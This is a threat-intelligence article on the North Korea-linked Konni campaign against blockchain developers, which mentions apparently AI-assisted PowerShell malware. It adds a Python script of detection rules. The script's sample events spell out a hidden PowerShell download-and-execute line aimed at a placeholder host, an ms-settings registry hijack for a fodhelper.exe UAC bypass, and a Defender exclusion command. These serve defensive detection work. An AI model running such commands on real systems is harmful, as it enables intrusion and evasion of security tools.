A group linked to North Korea has raised the stakes: researchers have detected spear-phishing campaigns aimed at developers and engineering teams in the blockchain ecosystem, in which the attackers use PowerShell malware that appears to have been written with the help of artificial intelligence tools. These operations are no longer limited to South Korea; targets have been observed in Japan, Australia and India, according to the technical analysis published by Check Point Research, which points to an evolution in the strategy and reach of the actor known as Konni.
Konni, also tracked in the industry under names such as Earth Imp, TA406 or Vedalia, has been active since at least 2014 and has shown considerable flexibility in its tooling and targeting. In recent months it has been linked to tactics ranging from the abuse of legitimate services to remotely wipe Android devices to the use of disguised links in advertising networks to slip past mail filters. The Genians security center described how the campaign dubbed "Operation Poseidon" took advantage of online-advertising click-redirection infrastructure to send victims to malicious files hosted on legitimate or compromised sites (Genians).

Social engineering remains the preferred entry point: messages that mimic financial notices or transfer confirmations induce the recipient to download a ZIP file. In the incidents documented by Check Point, these ZIPs contain a PDF decoy and a Windows shortcut (LNK) that, when opened, runs an embedded PowerShell loader. From there a multi-stage chain is triggered: documents are extracted to distract the user, a CAB file is unpacked containing a PowerShell backdoor, batch scripts prepare persistence, and an executable attempts to escalate privileges using known UAC bypass techniques, including abuse of fodhelper.exe (MITRE ATT&CK T1548.002).
The observed backdoor performs checks to evade analysis environments and sandboxes, fingerprints the system and works to consolidate access. Once established, the attacker drops a legitimate remote management tool, SimpleHelp, to keep persistent control, and communicates with command-and-control servers that hide behind a "filter" which answers only requests that look like typical browser traffic, making them harder to spot with network controls. Part of the technical sophistication shows in the ability to add exclusions to Microsoft Defender and in the removal of its own artifacts to reduce traceability.
What has particularly caught analysts' attention is the possible involvement of artificial intelligence tools in creating the backdoor: its modular design, readable documentation and placeholder-style comments point to AI-assisted development. Such use not only speeds up the production of malicious code but also tends to homogenize and "polish" malware, making it more maintainable and perhaps harder to distinguish from legitimate software.
The convergence of traditional techniques (spear-phishing, abuse of advertising redirects such as DoubleClick infrastructure, LNK files and exploitation of legitimate services) with emerging practices such as AI-assisted generation represents a strategic shift: instead of simply going after credentials or specific data from end users, attackers target development environments and supply chains, where a single intrusion can open multiple fronts and compromise entire projects.
This focus on development teams is not an isolated case. In parallel, campaigns have been reported that use Visual Studio Code tunnels planted on victims for remote access, malicious LNK files that deliver trojans, and compromises of business software vendors' update channels to distribute malware families to their customers. Research from firms such as WithSecure shows how incidents in the supply chain and in management tools have been exploited repeatedly by actors with both financial and intelligence motives.
What can affected teams do, especially in the blockchain sector and in sensitive development work? First, apply common sense to security: distrust archives and shortcut files received by email, verify senders and links outside the normal workflow, and avoid running downloaded binaries without prior analysis. On the technical side, it is critical to strengthen endpoint controls, limit unsupervised PowerShell execution (constrained language mode, script block logging, application control), audit scheduled tasks and privilege elevations, keep signatures and detections up to date, and apply network segmentation and egress controls so that compromised systems cannot reach C2 servers. Resources from agencies such as CISA offer practical guidance on mitigating phishing campaigns and responding to incidents.
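The chain described above (hidden PowerShell spawned by Explorer from an LNK, the fodhelper.exe auto-elevation hijack, a Defender exclusion added from a script) maps directly onto a few host-telemetry rules of the kind the mitigations just listed depend on. The following is an added example, not code from Check Point Research or from the campaign, that runs three such rules over constructed Sysmon-style process and registry events plus a PowerShell script-block log; the event field names, file paths and the sample payload are assumptions for illustration, not a vendor schema or real indicators.

```python
"""Added example: detection rules for an LNK -> PowerShell loader ->
fodhelper.exe UAC bypass -> Defender-exclusion chain, run over constructed
telemetry. Events are simplified Sysmon records (id 1 process create,
id 13 registry value set) and PowerShell script-block logs (id 4104);
field names, paths and payload are assumptions, not a vendor schema."""
import base64
import re

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
FODHELPER = r"C:\Windows\System32\fodhelper.exe"


def encode_ps(command: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE encoded script."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16le", errors="replace")


# Constructed sample telemetry for one host, in time order (seconds).
EVENTS = [
    {"id": 1, "ts": 1, "image": PS_IMAGE, "parent": EXPLORER,
     "cmd": "powershell.exe -w hidden -nop -ep bypass -enc "
            + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"id": 4104, "ts": 2, "script": "Add-MpPreference -ExclusionPath \"$env:APPDATA\\svc\""},
    {"id": 13, "ts": 3, "image": PS_IMAGE,
     "key": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\shell\open\command\(Default)",
     "value": r"C:\Users\dev\AppData\Roaming\svc\run.bat"},
    {"id": 13, "ts": 4, "image": PS_IMAGE,
     "key": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
     "value": ""},
    {"id": 1, "ts": 5, "image": FODHELPER, "parent": PS_IMAGE, "cmd": "fodhelper.exe"},
    {"id": 1, "ts": 6, "image": r"C:\Windows\System32\cmd.exe", "parent": FODHELPER,
     "cmd": r"cmd.exe /c C:\Users\dev\AppData\Roaming\svc\run.bat"},
    # Benign noise: an interactive console opened from the shell.
    {"id": 1, "ts": 7, "image": PS_IMAGE, "parent": EXPLORER, "cmd": "powershell.exe"},
]

SUSPICIOUS_FLAGS = [
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    re.compile(r"-nop(?:rofile)?\b", re.I),
]
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
MS_SETTINGS = re.compile(r"\\Classes\\ms-settings\\shell\\open\\command\\", re.I)
MP_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I)


def rule_lnk_loader(events):
    """Explorer-spawned PowerShell carrying 2+ loader-style flags: the shape
    of a shortcut whose target is an embedded one-liner. Decodes -enc."""
    hits = []
    for e in events:
        if e["id"] != 1 or not e["image"].lower().endswith("powershell.exe"):
            continue
        if not e.get("parent", "").lower().endswith("explorer.exe"):
            continue
        score = sum(1 for p in SUSPICIOUS_FLAGS if p.search(e["cmd"]))
        if score >= 2:
            m = ENC_ARG.search(e["cmd"])
            hits.append({"ts": e["ts"], "flags": score,
                         "decoded": decode_ps(m.group(1)) if m else None})
    return hits


def rule_fodhelper_bypass(events, window=60):
    """ms-settings handler written under HKU, then fodhelper.exe launched
    within `window` seconds. Children of fodhelper.exe are the elevated
    payload, since the legitimate binary spawns none."""
    hits = []
    hijacks = [e for e in events if e["id"] == 13 and MS_SETTINGS.search(e["key"])]
    for e in events:
        if e["id"] != 1 or e["image"].lower() != FODHELPER.lower():
            continue
        recent = [h for h in hijacks if 0 <= e["ts"] - h["ts"] <= window]
        if not recent:
            continue
        children = [c["cmd"] for c in events if c["id"] == 1 and c["ts"] >= e["ts"]
                    and c.get("parent", "").lower() == FODHELPER.lower()]
        hits.append({"ts": e["ts"], "children": children,
                     "handler": next((h["value"] for h in recent if h["value"]), "")})
    return hits


def rule_defender_exclusion(events):
    """Script-block log (4104) that adds a Defender exclusion from a script."""
    return [{"ts": e["ts"], "script": e["script"]}
            for e in events if e["id"] == 4104 and MP_EXCLUSION.search(e["script"])]


def run_rules(events):
    return {"lnk_loader": rule_lnk_loader(events),
            "fodhelper_bypass": rule_fodhelper_bypass(events),
            "defender_exclusion": rule_defender_exclusion(events)}


if __name__ == "__main__":
    for name, hits in run_rules(EVENTS).items():
        print(f"{name}: {hits}")
```

Run as a script it prints the hits for each rule. The fodhelper rule keys on the registry write followed by the launch, not on fodhelper.exe alone, because the binary runs legitimately whenever a user opens Optional Features; likewise the loader rule scores several flags together so that an interactive console opened from the shell (the last sample event) does not fire.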

It is also important to review internal device-management and update practices; the risk of a legitimate tool or service provider being used as a distribution vector persists, so integrity verification and real-time behavior monitoring are essential. Checking the use and configuration of RMM solutions such as SimpleHelp, and restricting their deployment to what is strictly necessary, reduces the attack surface.
The appearance of malicious code bearing an AI "signature" poses an additional dilemma: the same technology that speeds up defense (behavior-based detection, automated analysis) can also help attackers produce more consistent, modular malware. The response must therefore be twofold: improve detection tooling and, at the same time, cultivate the human security hygiene and organizational processes that reduce the chance that a careless click becomes a systemic compromise.
In short, the campaign attributed to Konni shows that threats evolve by combining old tactics with new capabilities. Cooperation between security vendors, technology companies and development teams, together with the adoption of basic and advanced controls, is the best way to keep these attacks from reaching their goal. For further technical details on the research and the associated indicators, see the Check Point Research report and the analyses of related actors published by Genians and WithSecure.